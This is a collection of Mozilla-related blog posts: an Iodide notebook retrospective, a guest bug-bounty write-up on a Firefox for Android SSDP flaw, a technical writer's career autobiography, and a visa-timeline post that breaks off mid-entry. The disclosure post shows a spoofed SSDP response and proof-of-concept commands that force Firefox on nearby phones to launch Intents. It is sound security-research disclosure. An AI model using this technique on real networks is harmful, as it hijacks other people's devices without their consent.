In some ways, I think Iodide has more in common with services like Glitch or Codepen than with Jupyter. In effect, it’s mostly offering a way to build up a static web page (doing whatever) using web technologies— even if the user interface affordances and cell-based computation model might remind you more of a scientific notebook.

What works well about this approach

There’s a few nifty things that come from doing things this way:

  • The environment is easily extensible for those familiar with JavaScript or other client side technologies. There is no need to mess with strange plugin architectures or APIs or conform to the opinions of someone else on what options there are for data visualization and presentation. If you want to use jQuery inside your notebook for a user interface widget, just import it and go!
  • The architecture scales to many, many users: since all the computation happens on the client, the server’s only role is to store and retrieve notebook content. alpha.iodide.io has happily been running on Heroku’s least expensive dyno type for its entire existence.
  • Reproducibility: so long as the iodide notebook has no references to data on third party servers with authentiction, there is no stopping someone from being able to reproduce whatever computations led to your results.
  • Related to reproducibility, it’s easy to build off of someone else’s notebook or exploration, since everything is so self-contained.

I continue to be surprised and impressed with what people come up with in the Jupyter ecosystem so I don’t want to claim these are things that “only Iodide” (or other tools like it) can do— what I will say is that I haven’t seen many things that combine both the conciseness and expressiveness of iomd. The beauty of the web is that there is such an abundance of tutorials and resources to support creating interactive content: when building iodide notebooks, I would freely borrow from resources such as MDN and Stackoverflow, instead of being locked into what the authoring software thinks one should be able express.

What’s awkward

Every silver lining has a cloud and (unfortunately) Iodide has a pretty big one. Depending on how you use Iodide, you will almost certainly run into the following problems:

  • You are limited by the computational affordances provided by the browser: there is no obvious way to offload long-running or expensive computations to a cluster of machines using a technology like Spark.
  • Long-running computations will block the main thread, causing your notebook to become extremely unresponsive for the duration.

The first, I (and most people?) can usually live with. Computers are quite powerful these days and most data tasks I’m interested in are easily within the range of capabilities of my laptop. In the cases where I need to do something larger scale, I’m quite happy to fire up a Jupyter Notebook, BigQuery Console, or <other tool of choice> to do the heavy-lifting, and then move back to a client-side approach to visualize and explore my results.

The second is much harder to deal with, since it means that the process of exploration that is so key to scientific computing. I’m quite happy to wait 5 seconds, 15 seconds, even a minute for a longer-running computation to complete but if I see the slow script dialog and everything about my environment grinds to a halt, it not only blocks my work but causes me to lose faith in the system. How do I know if it’s even going to finish?

This occurs way more often than you might think: even a simple notebook loading pandas (via pyodide) can cause Firefox to pop up the slow script dialog:

Why is this so? Aren’t browsers complex beasts which can do a million things in parallel these days? Only sort of: while the graphical and network portions of loading and using a web site are highly parallel, JavaScript and any changes to the DOM can only occur synchronously by default. Let’s break down a simple iodide example which trivially hangs the browser:

%% js

while (1) { true }

link (but you really don’t want to)

What’s going on here? When you execute that cell, the web site’s sole thread is now devoted to running that infinite loop. No longer can any other JavaScript-based event handler be run, so for example the text editor (which uses Monaco under the hood) and menus are now completely unresponsive.

The iodide team was aware of this issue since I joined the project. There were no end of discussions about how to work around it, but they never really come to a satisfying conclusion. The most obvious solution is to move the cell’s computation to a web worker, but workers don’t have synchronous access to the DOM which is required for web content to work as you’d expect. While there are projects like ComLink that attempt to bridge this divide, they require both a fair amount of skill and code to use effectively. As mentioned above, one of the key differentiators between iodide and other notebook environments is that tools like jQuery, d3, etc. “just work”. That is, you can take a code snipit off the web and run it inside an iodide notebook: there’s no workaround I’ve been able to find which maintains that behaviour and ensures that the Iodide notebook environment is always responsive.

It took a while for this to really hit home, but having some separation from the project, I’ve come to realize that the problem is that the underlying technology isn’t designed for the task we were asking of it, nor is it likely to ever be in the near future. While the web (by which I mean not only the browser, but the ecosystem of popular tooling and libraries that has been built on top of it) has certainly grown in scope to things it was never envisioned to handle like games and office applications, it’s just not optimized for what I’d call “editable content”. That is, the situation where a web page offers affordances for manipulating its own representation.

While modern web browsers have evolved to (sort of) protect one errant site from bringing the whole thing down, they certainly haven’t evolved to protect a particular site against itself. And why would they? Web developers usually work in the terminal and text editor: the assumption is that if their test code misbehaves, they’ll just kill their tab and start all over again. Application state is persisted either on-disk or inside an external database, so nothing will really be lost.

Could this ever change? Possibly, but I think it would be a radical rethinking of what the web is, and I’m not really sure what would motivate it.

A way forward

While working on iodide, we were fond of looking at this diagram, which was taken from this study of the data science workflow:

It describes how people typically perform computational inquiry: typically you would poke around with some raw data, run some transformations on it. Only after that process was complete would you start trying to build up a “presentation” of your results to your audience.

Looking back, it’s clear that Iodide’s strong suit was the explanation part of this workflow, rather than collaboration and exploration. My strong suspicion is that we actually want to use different tools for each one of these tasks. Coincidentally, this also maps to the bulk of my experience working with data at Mozilla, using iodide or not: my most successful front-end data visualization projects were typically the distilled result of a very large number of adhoc explorations (python scripts, SQL queries, Jupyter notebooks, …). The actual visualization itself contains very little computational meat: basically “just enough” to let the user engage with the data fruitfully.

Unfortunately much of my work in this area uses semi-sensitive internal Mozilla data so can’t be publicly shared, but here’s one example:

link

I built this dashboard in a single day to track our progress (resolved/open bugs) when we were migrating our data platform from AWS to GCP. It was useful: it let us quickly visualize which areas needed more attention and gave upper management more confidence that we were moving closer to our goal. However, there was little computation going on in the client: most of the backend work was happening in our Bugzilla instance: the iodide notebook just does a little bit of post-processing to visualize the results in a useful way.

Along these lines, I still think there is a place in the world for an interactive visualization environment built on principles similar to iodide: basically a markdown editor augmented with primitives oriented around data exploration (for example, charts and data tables), with allowances to bring in any JavaScript library you might want. However, any in-depth data processing would be assumed to have mostly been run elsewhere, in advance. The editing environment could either be the browser or a code editor running on your local machine, per user preference: in either case, there would not be any really important computational state running in the browser, so things like dynamic reloading (or just closing an errant tab) should not cause the user to lose any work.

This would give you the best of both worlds: you could easily create compelling visualizations that are easy to share and remix at minimal cost (because all the work happens in the browser), but you could also use whatever existing tools work best for your initial data exploration (whether that be JavaScript or the more traditional Python data science stack). And because the new tool has a reduced scope, I think building such an environment would be a much more tractable project for an individual or small group to pursue.

More on this in the future, I hope.

Many thanks to Teon Brooks and Devin Bayly for reviewing an early draft of this post

Mozilla Attack & DefenseFirefox for Android: LAN-Based Intent Triggering

 

This blog post is a guest blog post. We invite participants of our bug bounty program to write about bugs they’ve reported to us.

Background

In its inception, Firefox for Desktop has been using one single process for all browsing tabs. Since Firefox Quantum, released in 2017, Firefox has been able to spin off multiple “content processes”. This revised architecture allowed for advances in security and performance due to sandboxing and parallelism. Unfortunately, Firefox for Android (code-named “Fennec”) could not instantly be built upon this new technology. Legacy architecture with a completely different user interface required Fennec to remain single-process. But in the fall of 2020, a Fenix rose: The latest version of Firefox for Android is supported by Android Components, a collection of independent libraries to make browsers and browser-like apps that bring latest rendering technologies to the Android ecosystem.

For this rewrite to succeed, most work on legacy Android product (“Fennec”) was paused and put into maintenance mode except for high-severity security vulnerabilities.

It was during this time, coinciding with the general availability of the new Firefox for Android, that Chris Moberly from GitLab’s Security Red Team reported the following security  bug in the almost legacy browser.

Overview

Back in August, I found a nifty little bug in the Simple Service Discovery Protocol (SSDP) engine of Firefox for Android 68.11.0 and below. Basically, a malicious SSDP server could send Android Intent URIs to anyone on a local wireless network, forcing their Firefox app to launch activities without any user interaction. It was sort of like a magical ability to click links on other peoples’ phones without them knowing.

I disclosed this directly to Mozilla as part of their bug bounty program – you can read the original submission here.

I discovered the bug around the same time Mozilla was already switching over to a completely rebuilt version of Firefox that did not contain the vulnerability. The vulnerable version remained in the Google Play store only for a couple weeks after my initial private disclosure. As you can read in the Bugzilla issue linked above, the team at Mozilla did a thorough review to confirm that the vulnerability was not hiding somewhere in the new version and took steps to ensure that it would never be re-introduced.

Disclosing bugs can be a tricky process with some companies, but the Mozilla folks were an absolute pleasure to work with. I highly recommend checking out their bug bounty program and seeing what you can find!

I did a short technical write-up that is available in the exploit repository. I’ll include those technical details here too, but I’ll also take this opportunity to talk a bit more candidly about how I came across this particular bug and what I did when I found it.

 

 

Bug Hunting

I’m lucky enough to be paid to hack things at GitLab, but after a long hard day of hacking for work I like to kick back and unwind by… hacking other things! I’d recently come to the devastating conclusion that a bug I had been chasing for the past two years either didn’t exist or was simply beyond my reach, at least for now. I’d learned a lot along the way, but it was time to focus on something new.

A friend of mine had been doing some cool things with Android, and it sparked my interest. I ordered a paperback copy of “The Android Hacker’s Handbook” and started reading. When learning new things, I often order the big fat physical book and read it in chunks away from my computer screen. Everyone learns differently of course, but there is something about this method that helps break the routine for me.

Anyway, I’m reading through this book and taking notes on areas that I might want to explore. I spend a lot of time hacking in Linux, and Android is basically Linux with an abstraction layer. I’m hoping I can find something familiar and then tweak some of my old techniques to work in the mobile world.

I get to Chapter 2, where it introduces the concept of Android “Intents” and describes them as follows:

“These are message objects that contain information about an operation to be performed… Nearly all common actions – such as tapping a link in a mail message to launch the browser, notifying the messaging app that an SMS has arrived, and installing and removing applications – involve Intents being passed around the system.”

This really piqued my interest, as I’ve spent quite a lot of time looking into how applications pass messages to each other under Linux using things like Unix domain sockets and D-Bus. This sounded similar. I put the book down for a bit and did some more research online.

The Android developer documentation provides a great overview on Intents. Basically, developers can expose application functionality via an Intent. Then they create something called an “Intent filter” which is the application’s way of telling Android what types of message objects it is willing to receive.

For example, an application could offer to send an SMS to one of your contacts. Instead of including all of the code required actually to send an SMS, it could craft an Intent that included things like the recipient phone number and a message body and then send it off to the default messaging application to handle the tricky bits.

Something I found very interesting is that while Intents are often built in code via a complex function, they can also be expressed as URIs, or links. In the case of our text message example above, the Intent URI to send an SMS could look something like this:

sms://8675309?body=”hey%20there!”

In fact, if you click on that link while reading this on an Android phone, it should pop open your default SMS application with the phone number and message filled in. You just triggered an Intent.

Preview of draft SMS

It was at this point that I had my “Hmmm, I wonder what would happen if I…” moment. I don’t know how it is for everyone else, but that phrase pretty much sums up hacking for me.

You see, I’ve had a bit of success in forcing desktop applications to visit URIs and have used this in the past to find exploitable bugs in targets like Plex, Vuze, and even Microsoft Windows.

These previous bugs abused functionality in something called Simple Service Discovery Protocol (SSDP), which is used to advertise and discover services on a local network. In SSDP, an initiator will send a broadcast out over the local network asking for details on any available services, like a second-screen device or a networked speaker. Any system can respond back with details on the location of an XML file that describes their particular service. Then, the initiator will automatically go to that location to parse the XML to better understand the service offering.

And guess what that XML file location looks like…

… That’s right, a URI!

In my previous research on SSDP vulnerabilities, I had spent a lot of time running Wireshark on my home network. One of the things I had noticed was that my Android phone would send out SSDP discovery messages when using the Firefox mobile application. I tried attacking it with all of the techniques I could think of at that time, but I never observed any odd behavior.

But that was before I knew about Intents!

So, what would happen if we created a malicious SSDP server that advertised a service’s location as an Android Intent URI? Let’s find out!

What happened…

First, let’s take a look at what I observed over the network prior to putting this all together. While running Wireshark on my laptop, I noticed repeated UDP packets originating from my Android phone when running Firefox. They were being sent to port 1900 of the UDP multicast address 239.255.255.250. This meant that any device on the local network could see these packets and respond if they chose to.

The packets looked like this:

M-SEARCH * HTTP/1.1 HOST: 239.255.255.250:1900 MAN: "ssdp:discover" MX: 2 ST: roku:ecp

This is Firefox asking if there are any Roku devices on the network. It would actually ask for other device types as well, but the device type itself isn’t really relevant for this bug.

It looks like an HTTP request, right? It is… sort of. SSDP uses two forms of HTTP over UDP:

  • HTTPMU: HTTP over multi-cast UDP. Meaning the request is broadcast to the entire network over UDP. This is used for clients discovering devices and servers announcing devices.
  • HTTPU: HTTP over uni-cast UDP. Meaning the request is sent from one host directly to another over UDP. This is used for responding to search requests.

If we had a Roku on the network, it would immediately respond with a UDP uni-cast packet that looks something like this:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 16 Oct 2018 20:17:12 GMT
EXT:
LOCATION: http://192.168.1.100/device-desc.xml
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01
01-NLS: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c
SERVER: UPnP/1.0
ST: roku:ecp
USN: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c::roku:ecp
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

Then, Firefox would query that URI in the LOCATION header (http://192.168.1.100/device-desc.xml), expecting to find an XML document that told it all about the Roku and how to interact with it.

This is where the experimenting started. What if, instead of http://192.168.1.100/device-desc.xml, I responded back with an Android Intent URI?

I grabbed my old SSDP research tool evil-ssdp, made some quick modifications, and replied with a packet like this:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 16 Oct 2018 20:17:12 GMT
EXT:
LOCATION: tel://666
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01
01-NLS: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c
SERVER: UPnP/1.0
ST: upnp:rootdevice
USN: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c::roku:ecp
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

Notice in the LOCATION header above we are now using the URI tel://666, which uses the URI scheme for Android’s default Phone Intent.

Guess what happened? The dialer on the Android device magically popped open, all on its own, with absolutely no interaction on the mobile device itself. It worked!

 

SSDP Flow

 

PoC

I was pretty excited at this point, but I needed to do some sanity checks and make sure that this could be reproduced reliably.

I toyed around with a couple different Android devices I had, including the official emulator. The behavior was consistent. Any device on the network running Firefox would repeatedly trigger whatever Intent I sent via the LOCATION header as long as the PoC script was running.

This was great, but for a good PoC we need to show some real impact. Popping the dialer may look like a big scary Remote Code Execution bug, but in this case it wasn’t. I needed to do better.

The first step was to write an exploit that was specifically designed for this bug and that provided the flexibility to dynamically provide an Intent at runtime. You can take a look at what I ended up with in this Python script.

The TL;DR of the exploit code is that it will listen on the network for SSDP “discovery” messages and respond back to them pretending to be exactly the type of device they are looking for. Instead of providing a link to an XML in the LOCATION header, I would pass in a user supplied argument, which can be an Android Intent. There’s some specifics here that matter and have to be formatted exactly right in order for the initiator to trust them. Luckily, I’d spent some quality time reading the IETF specs to figure that out in the past.

The next step was to find an Intent that would be meaningful in a demonstration of web browser exploitation. Targeting the browser itself seemed like a likely candidate. However, the developer docs were not very helpful here – the URI scheme to open a web browser is defined as http or https. However, the native SSDP code in Firefox mobile would handle those URLs on its own and not pass them off to the Intent system.

A bit of searching around and I learned that there was another way to build an Intent URI while specifying the actual app you would like to send it to. Here’s an example of an Intent URI to specifically launch Firefox and browse to example.com:

intent://example.com/#Intent;scheme=http;package=org.mozilla.firefox;end

If you’d like to try out the exploit yourself, you can grab an older version of Firefox for Android here.

To start, simply join an Android device running a vulnerable version of Firefox to a wireless network and make sure Firefox is running.

Then, on a device that is joined to the same wireless network, run the following command:

# Replace "wlan0" with the wireless device on your attacking machine.
python3 ./ffssdp.py wlan0 -t "intent://example.com/#Intent;scheme=http;package=org.mozilla.firefox;end"

All Android devices on the network running Firefox will automatically browse to example.com.

If you’d like to see an example of using the exploit to launch another application, you can try something like the following, which will open the mail client with a pre-filled message:

# Replace "wlan0" with the wireless device on your attacking machine.
python3 ./ffssdp.py wlps0 -t "mailto:itpeeps@work.com?subject=I've%20been%20hacked&body=OH%20NOES!!!"

These of course are harmless examples to demonstrate the exploit. A bad actor could send a victim to a malicious website, or directly to the location of a malicious browser extension and repeatedly prompt the user to install it.

It is possible that a higher impact exploit could be developed by looking deeper into the Intents offered inside Firefox or to target known-vulnerable Intents in other applications.

When disclosing vulnerabilities, I often feel a sense of urgency once I’ve found something new. I want to get it reported as quickly as possible, but I also try to make sure I’ve built a PoC that is meaningful enough to be taken seriously. I’m sure I don’t always get this balance right, but in this case I felt like I had enough to provide a solid report to Mozilla.

What came next

I worked out a public disclosure date with Mozilla, waited until that day, and then uploaded the exploit code with a short technical write-up and posted a link on Twitter.

To be perfectly honest, I thought the story would end there. I assumed I would get a few thumbs-up emojis from friends and it would then quickly fade away. Or worse, someone would call me out as a fraud and point out that I was completely wrong about the entire thing.

But, guess what? It caught on a bit. Apparently people are really into web browser bugs AND mobile bugs. I think probably it resonates as it is so close to home, affecting that little brick that we all carry in our pockets and share every intimate detail of our life with.

I have a Google “search alert” for my name, and it started pinging me a couple times a day with mentions in online tech articles all around the world, and I even heard from some old friends who came across my name in their news feeds. Pretty cool!

While I’ll be the first to admit that this isn’t some super-sophisticated, earth-shattering discovery, it did garner me a small bit of positive attention and in my line of work that’s pretty handy. I think this is one of the major benefits of disclosing bugs in open-source software to organizations that care – the experience is transparent and can be shared with the world.

 

Another POC video created by @LukasStefanko

 

Lessons learned

This was the first significant discovery I’ve made both in a mobile application and in a web browser, and I certainly wouldn’t consider myself an expert in either. But here I am, writing a guest blog with Mozilla. Who’d have thought? I guess the lesson here is to try new things. Try old things in new ways. Try normal things in weird things. Basically, just try things.

Hacking, for me at least, is more of an exploration than a well-planned journey. I often chase after random things that look interesting, trying to understand exactly what is happening and why it is happening that way. Sometimes it pays off right away, but more often than not it’s an iterative process that provides benefits at unexpected times. This bug was a great example, where my past experience with SSDP came back to pay dividends with my new research into Android.

Also, read books! And while the book I mention above just happens to be about hacking, I honestly find just as much (maybe more) inspiration consuming information about how to design and build systems. Things are much easier to take apart if you understand how they are put together.

Finally, don’t avoid looking for bugs in major applications just because you may not be the globally renowned expert in that particular area. If I did that, I would never find any at all. The bugs are there, you just have to have curiosity and persistence.

If you read this far, thanks! I realize I went off on some personal tangents, but hopefully the experience will resonate with other hackers on their own explorations.

With that, back to you Freddy.

Conclusion

As one of the oldest Bug Bounty Programs out there, we really enjoy and encourage direct participation on Bugzilla. The direct communication with our developers and security engineers help you gain insight into browser development and allows us to gain new perspectives.

Furthermore, we will continue to have guest blog posts for interesting bugs here. If you want to learn more about our security internals, follow us on Twitter @attackndefense or subscribe to our RSS feed.

Finally, thanks to Chris for reporting this interesting bug!

Eric ShepherdAmazon Wins Sheppy

Following my departure from the MDN documentation team at Mozilla, I’ve joined the team at Amazon Web Services, documenting the AWS SDKs. Which specific SDKs I’ll be covering are still being finalized; we have some in mind but are determining who will prioritize which still, so I’ll hold off on being more specific.

Instead of going into details on my role on the AWS docs team, I thought I’d write a new post that provides a more in-depth introduction to myself than the little mini-bios strewn throughout my onboarding forms. Not that I know if anyone is interested, but just in case they are…

Personal

Now a bit about me. I was born in the Los Angeles area, but my family moved around a lot when I was a kid due to my dad’s work. By the time I left home for college at age 18, we had lived in California twice (where I began high school), Texas twice, Colorado twice, and Louisiana once (where I graduated high school). We also lived overseas once, near Pekanbaru, Riau Province on the island of Sumatra in Indonesia. It was a fun and wonderful place to live. Even though we lived in a company town called Rumbai, and were thus partially isolated from the local community, we still lived in a truly different place from the United States, and it was a great experience I cherish.

My wife, Sarah, and I have a teenage daughter, Sophie, who’s smarter than both of us combined. When she was in preschool and kindergarten, we started talking about science in pretty detailed ways. I would give her information and she would draw conclusions that were often right, thinking up things that essentially were black holes, the big bang, and so forth. It was fun and exciting to watch her little brain work. She’s in her “nothing is interesting but my 8-bit chiptunes, my game music, the games I like to play, and that’s about it” phase, and I can’t wait until she’s through that and becomes the person she will be in the long run. Nothing can bring you so much joy, pride, love, and total frustration as a teenage daughter.

Education

I got my first taste of programming on a TI-99/4 computer bought by the Caltex American School there. We all were given a little bit of programming lesson just to get a taste of it, and I was captivated from the first day, when I got it to print a poem based on “Roses are red, violets are blue” to the screen. We were allowed to book time during recesses and before and after school to use the computer, and I took every opportunity I could to do so, learning more and more and writing tons of BASIC programs on it.

This included my masterpiece: a game called “Alligator!” in which you drove an alligator sprite around with the joystick, eating frogs that bounced around the screen while trying to avoid the dangerous bug that was chasing you. When I discovered that other kids were using their computer time to play it, I was permanently hooked.

I continued to learn and expand my skills over the years, moving on to various Apple II (and clone) computers, eventually learning 6502 and 65816 assembly, Pascal, C, dBase IV, and other languages.

During my last couple years of high school, I got a job at a computer and software store (which was creatively named “Computer and Software Store”) in Mandeville, Louisiana. In addition to doing grunt work and front-of-store sales, I also spent time doing programming for contract projects the store took on. My first was a simple customer contact management program for a real estate office. My most complex completed project was a three-store cash register system for a local chain of taverns and bars in the New Orleans area. I also built most of a custom inventory, quotation, and invoicing system for the store, though this was never finished due to my departure to start college.

The project about which I was most proud: a program for tracking information and progress of special education students and students with special needs for the St. Tammany Parish School District. This was built to run on an Apple IIe computer, and I was delighted to have the chance to build a real workplace application for my favorite platform.

I attended the University of California—Santa Barbara with a major in computer science. I went through the program and reached the point where I only needed 12 more units (three classes): one general education class under the subject area “literature originating in a foreign language” and two computer science electives. When I went to register for my final quarter, I discovered that none of the computer science classes offered that quarter were ones I could take to fulfill my requirements (I’d either already taken them or they were outside my focus area, and thus wouldn’t apply).

Thus I withdrew from school for a quarter with the plan that I would try again for the following quarter. During the interim, I became engaged to my wife and took my first gaming industry job (where they promised to allow me leave, with benefits, for the duration of my winter quarter back at school). As the winter approached, I drove up to UCSB to get a catalog and register in person. Upon arrival, I discovered that, once again, there were no computer science offerings that would fulfill my requirements.

At that point, I was due to marry in a few months (during the spring quarter), my job was getting more complicated due to the size and scope of the projects I was being assigned, and the meaningfulness of the degree was decreasing as I gained real work experience.

Thus, to this day, I remain just shy of my computer science degree. I have regrets at times, but never so much so that it makes sense to go back. Especially given the changed requirements and the amount of extra stuff I’d probably have to take. My experience at work now well outweighs the benefits of the degree.

The other shoe…

Time to drop that other shoe. I have at least one, and possibly two, chronic medical conditions that complicate everything I do. If there are two such conditions, they’re similar enough that I generally treat them as one when communicating with non-doctors, so that’s what I’ll do here.

I was born with tibiae (lower leg bones) that were twisted outward abnormally. This led to me walking with feet that were pointed outward at about a 45° angle from normal. This, along with other less substantial issues with the structure of my legs, was always somewhat painful, especially when doing things which really required my feet to point forward, such as walking on a narrow beam, skating, or trying to water ski.

Over time, this pain became more constant, and began to change. I noticed numbness and tingling in my feet and ankles, along with sometimes mind-crippling levels of pain. In addition, I developed severe pain in my neck, shoulders, and both arms. Over time, I began to have spasms, in which it felt like I was being blasted by an electric shock, causing my arms or legs to jerk wildly. At times, I would find myself uncontrollably lifting my mouse off the desk and slamming it down, or even throwing it to the floor, due to these spasms.

Basically, my nervous system has run amok. Due, we think, to a lifetime of strain and pressure caused by my skeletal structure issues, the nerves have been worn and become permanently damaged in various places. This can’t be reversed, and the pain I feel every moment of every day will never go away.

I engage in various kinds of therapy, both physical and medicinal, and the pain is kept within the range of “ignorable” much of the time. But sometimes it spikes out of that range and becomes impossible to ignore, leading to me not being able to focus clearly on what I’m doing. Plus there are times when it becomes so intense, all I can do is curl up and ride it out. This can’t be changed, and I’ve accepted that. We do our best to manage it and I’m grateful to have access to the medical care I have.

This means, of course, that I have times during which I am less attentive than I would like to be, or have to take breaks to ride out pain spikes. On less frequent occasions, I have to write a day off entirely when I simply can’t shake the pain at all. I have to keep warm, too, since cold (even a mild chill or a slight cooling breeze) can trigger the pain to spike abruptly.

But I’ve worked out systems and skills that let me continue to do my work despite all this. The schedule can be odd, and I have to pause my work for a while a few times a week, but I get the job done.

I wrote a longer and more in-depth post about my condition and how it feels a few years ago, if you want to know more.

Hobbies and free time

My very favorite thing to do in my free time is to write code for my good old Apple II computers. Or, barring that, to work on the Apple IIgs emulator for the Mac that I’m the current developer for. I dabble in Mac and iOS code and have done a few small projects for my own use. However, due to my medical condition, I don’t get to spend as much time doing that as I can.

With the rest of my free time, I love to watch movies and read books. So very, very many books. My favorite genres are science fiction and certain types of mysteries and crime thrillers, though I dabble in other areas as well. I probably read, on average, four to six novels per week.

I also love to play various types of video games. I have an Xbox One, but I don’t play on it much (I got it mostly to watch 4K Blu-Ray discs on it), though I do have a few titles for it. I’ve played and enjoyed the Diablo games as well as StarCraft, and have been captivated by many of the versions of Civilization over the years (especially the original and Civ II). I also, of course, play several mobile games.

My primary gaming focus has been World of Warcraft for years. I was a member of a fairly large guild for a few years, then joined a guild that split off from it, but that guild basically fell apart. Only a scant handful of us are left, and none of us really feel like hunting for another guild, and since we enjoy chatting while we play, we do fine. It’d be interesting, though, to find coworkers that play and spend some time with them.

Career

I began my career as a software engineer for a small game development shop in Southern California. My work primarily revolved around porting games from other platforms to the Mac, though I did also do small amounts of Windows development at times. I ported a fair number of titles to Mac, most of which most people probably don’t remember—if they ever heard of them at all—but some of them were actually pretty good games. I led development of a Mac/Windows game for kids which only barely shipped due to changing business conditions with the publisher, and by then I was pretty much fed up with the stress of working in the games industry.

Over the years, I’ve picked or at least used up a number of languages, including C++ (though I’ve not written any in years now), JavaScript, Python, Perl, and others. I love trying out new languages, and have left out a lot of the ones I experimented with and abandoned over the years.

Be

By that point, I was really intrigued by the Be Operating System, and started trying to get a job there. The only opening I wasn’t painfully under-qualified for was a technical writing position. It occurred to me that I’ve always written well (according to teachers and professors, at least), so I applied and eventually secured a junior writer job on the BeOS documentation team.

Within seven months, I was a senior technical writer and was deeply involved in writing the Be Developers Guide (more commonly known as the Be Book) and Be Advanced Topics (which are still the only two published books which contain anything I’ve written). Due to the timing of my arrival, very little for my work is in the Be Book, but broad sections of Be Advanced Topics were written by me.

Palm

Unfortunately, for various reasons, BeOS wasn’t able to secure a large enough chunk of the market to succeed, and our decline led to our acquisition by Palm, the manufacturers of the Palm series of handhelds. We were merged into the various teams there, with myself joining the writing team for Palm OS documentation.

Within just a handful of weeks, the software team, including those of us documenting the operating system, was spun off into a new company, PalmSource. There, I worked on documentation updates for Palm OS 5, as well as updated and brand-new documentation for Palm OS 6 and 6.1.

My most memorable work was done on the rewrites and updates of the Low-Level Communications Guide and the High-Level Communications Guide, as well as on various documents for licensees’ use only. I also wrote the Binder Guide for Palm OS 6, and various other things. It was fascinating work, though ultimately and tragically doomed due to the missteps with the Palm OS 6 launch and the arrival of the iPhone three years after my departure from PalmSource.

Unfortunately, neither the Palm OS 6 update and its follow up, version 6.1, saw significant use during my tenure due to the vast changes in the platform that were made in order to modernize the operating system for future devices. The OS was also sluggish in Palm OS 6, though 6.1 was quite peppy and really very nice. But the writing was on the wall there and, though I survived three or four rounds of layoffs, eventually I was cut loose.

After PalmSource let me go, I returned briefly to the games industry, finalizing the ports of a couple of games to the Mac for Reflexive Entertainment (now part of Amazon): Ricochet Lost Worlds and Big Kahuna Reef. I departed Reflexive shortly after completing those projects, deciding I wanted to return to technical writing, or at least something not in the game industry.

Mozilla

That’s why my friend Dave Miller, who was at the time on the Bugzilla team as well as working in IT for Mozilla, recommended me for a Mac programming job at Mozilla. When I arrived for my in-person interviews, I discovered that they had noticed my experience as a writer and had shunted me over to interview for a writing job instead. After a very long day of interviews and a great deal of phone and email tag, I was offered a job as a writer on the Mozilla Developer Center team.

And there I stayed for 14 years, through the changes in documentation platform (from MediaWiki to DekiWiki to our home-built Kuma platform), the rebrandings (to Mozilla Developer Network, then to simply MDN, then MDN Web Docs), and the growth of our team over time. I began as the sole full-time writer, and by our peak as a team we had five or six writers. The MDN team was fantastic to work with, and the work had enormous meaning. We became over time the de-facto official documentation site for web developers.

My work spanned a broad range of topics from basics of HTML and CSS to the depths of WebRTC, WebSockets, and other, more arcane topics. I loved doing the work, with the deep dives into the source code of the major browsers to ensure I understood how things work and why and reading the specifications for new APIs.

Knowing that my work was not only used by millions of developers around the world, but was being used by teachers, professors, and students, as well as others who just wanted to learn, was incredibly satisfying. I loved doing it and I’m sure I’ll always miss it.

But between the usual business pressures and the great pandemic of 2020, I found myself laid off by Mozilla in mid-2020. That leads me to my arrival at Amazon a few weeks later, where I started on October 26.

Amazon!

So here we are! I’m still onboarding, but soon enough, I’ll be getting down to work, making sure my parts of the AWS documentation are as good as they can possibly be. Looking forward to it!

Daniel Stenberga US visa in 937 days

Here’s the complete timeline of events. From my first denial to travel to the US until I eventually received a tourist visa. And then I can’t go anyway.

December 5-11, 2016

I spent a week on Hawaii with Mozilla – my employer at the time. This was my 12th visit to the US over a period of 19 years. I went there on ESTA, the visa waiver program Swedish citizens can use. I’ve used it many times, there was nothing special this time. The typical procedure with ESTA is that we apply online: fill in a form, pay a 14 USD fee and get a confirmation within a few days that we’re good to go.

<figcaption>I took this photo at the hotel we stayed at during the Mozilla all-hands on Hawaii 2016.</figcaption>

June 26, 2017

In the early morning one day by the check-in counter at Arlanda airport in Sweden, I was refused to board my flight. Completely unexpected and out of the blue! I thought I was going to San Francisco via London with British Airways, but instead I had to turn around and go back home – slightly shocked. According to the lady behind the counter there was “something wrong with my ESTA”. I used the same ESTA and passport as I used just fine back in December 2016. They’re made to last two years and it had not expired.

<figcaption>Tweeted by me, minutes after being stopped at Arlanda.</figcaption>

People engaged by Mozilla to help us out could not figure out or get answers about what the problem was (questions and investigations were attempted both in the US and in Sweden), so we put our hopes on that it was a human mistake somewhere and decided to just try again next time.

April 3, 2018

I missed the following meeting (in December 2017) for other reasons but in the summer of 2018 another Mozilla all-hands meeting was coming up (in Texas, USA this time) so I went ahead and applied for a new ESTA in good time before the event – as I was a bit afraid there was going to be problems. I was right and I got denied ESTA very quickly. “Travel Not Authorized”.

<figcaption>Rejected from the ESTA program.</figcaption>

Day 0 – April 17, 2018

Gaaah. It meant it was no mistake last year, they actually mean this. I switched approach and instead applied for a tourist visa. I paid 160 USD, filled in a ridiculous amount of information about me and my past travels over the last 15 years and I visited the US embassy for an in-person interview and fingerprinting.

This is day 0 in the visa process, 296 days after I was first stopped at Arlanda.

Day 90 – July 2018

I missed the all-hands meeting in San Francisco when I didn’t get the visa in time.

Day 240 – December 2018

I quit Mozilla, so I then had no more reasons to go to their company all-hands…

Day 365 – April 2019

A year passed. “someone is working on it” the embassy email person claimed when I asked about progress.

Day 651- January 28, 2020

I emailed the embassy to query about the process

<figcaption>Screenshotted email</figcaption>

The reply came back quickly:

Dear Sir,

All applications are processed in the most expeditious manner possible. While we understand your frustration, we are required to follow immigration law regarding visa issuances. This process cannot be expedited or circumvented. Rest assured that we will contact you as soon as the administrative processing is concluded.

Day 730 – April 2020

Another year had passed and I had given up all hope. Now it turned into a betting game and science project. How long can they actually drag out this process without saying either yes or no?

Day 871 – September 3, 2020

A friend of mine, a US citizen, contacted his Congressman – Gerry Connolly – about my situation and asked for help. His office then subsequently sent a question to the US embassy in Stockholm asking about my case. While the response that arrived on September 17 was rather negative…

your case is currently undergoing necessary administrative processing and regrettably it is not possible to predict when this processing will be completed.

… I think the following turn of events indicates it had an effect. It unclogged something.

Day 889 – September 22, 2020

